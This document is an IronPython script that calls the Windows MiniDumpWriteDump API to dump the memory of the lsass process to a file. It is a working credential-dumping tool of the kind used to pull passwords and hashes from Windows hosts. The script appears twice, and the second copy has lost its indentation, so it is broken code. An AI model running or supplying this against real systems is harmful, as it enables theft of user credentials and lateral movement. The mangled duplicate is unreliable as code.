ihamburglar/MiniDumpWriteDump.ipy.py

## MiniDumpWriteDump.ipy.py
#   This is an example of how to run MiniDumpWriteDump functionality
#   natively in IronPython without a C# wrapper.

from System.Runtime.InteropServices import DllImportAttribute, PreserveSigAttribute
from System.Diagnostics import Process
from System.IO import FileStream, FileMode, FileAccess,FileShare
import clrtype, System

class NativeMethods(object):
    __metaclass__ = clrtype.ClrClass

    from System.Runtime.InteropServices import DllImportAttribute, PreserveSigAttribute
    DllImport = clrtype.attribute(DllImportAttribute)
    PreserveSig = clrtype.attribute(PreserveSigAttribute)
    @staticmethod
    @DllImport("dbghelp.dll")
    @PreserveSig()
    @clrtype.accepts(System.IntPtr,System.UInt32,System.IntPtr,System.Int32,System.Int32,System.Int32,System.Int32)
    @clrtype.returns(System.Boolean)
    def MiniDumpWriteDump(phandle,pid,file,dumpType,expParam,userStreamParam,callbackParam): raise RuntimeError("MiniDump Failed. Do you have permission?")

#Specify the process(es) you want to dump.
procname = 'lsass'
ids = Process.GetProcessesByName(procname)
for pid in ids:
    file = procname + '.' +str(pid.Id) + '.dump'
    fs = FileStream(file, FileMode.Create, FileAccess.ReadWrite, FileShare.Write)
    NativeMethods().MiniDumpWriteDump(pid.Handle,pid.Id,fs.Handle,0x00000002,0,0,0)
	# This is an example of how to run MiniDumpWriteDump functionality
	# natively in IronPython without a C# wrapper.

	from System.Runtime.InteropServices import DllImportAttribute, PreserveSigAttribute
	from System.Diagnostics import Process
	from System.IO import FileStream, FileMode, FileAccess,FileShare
	import clrtype, System

	class NativeMethods(object):
	__metaclass__ = clrtype.ClrClass

	from System.Runtime.InteropServices import DllImportAttribute, PreserveSigAttribute
	DllImport = clrtype.attribute(DllImportAttribute)
	PreserveSig = clrtype.attribute(PreserveSigAttribute)
	@staticmethod
	@DllImport("dbghelp.dll")
	@PreserveSig()
	@clrtype.accepts(System.IntPtr,System.UInt32,System.IntPtr,System.Int32,System.Int32,System.Int32,System.Int32)
	@clrtype.returns(System.Boolean)
	def MiniDumpWriteDump(phandle,pid,file,dumpType,expParam,userStreamParam,callbackParam): raise RuntimeError("MiniDump Failed. Do you have permission?")

	#Specify the process(es) you want to dump.
	procname = 'lsass'
	ids = Process.GetProcessesByName(procname)
	for pid in ids:
	file = procname + '.' +str(pid.Id) + '.dump'
	fs = FileStream(file, FileMode.Create, FileAccess.ReadWrite, FileShare.Write)
	NativeMethods().MiniDumpWriteDump(pid.Handle,pid.Id,fs.Handle,0x00000002,0,0,0)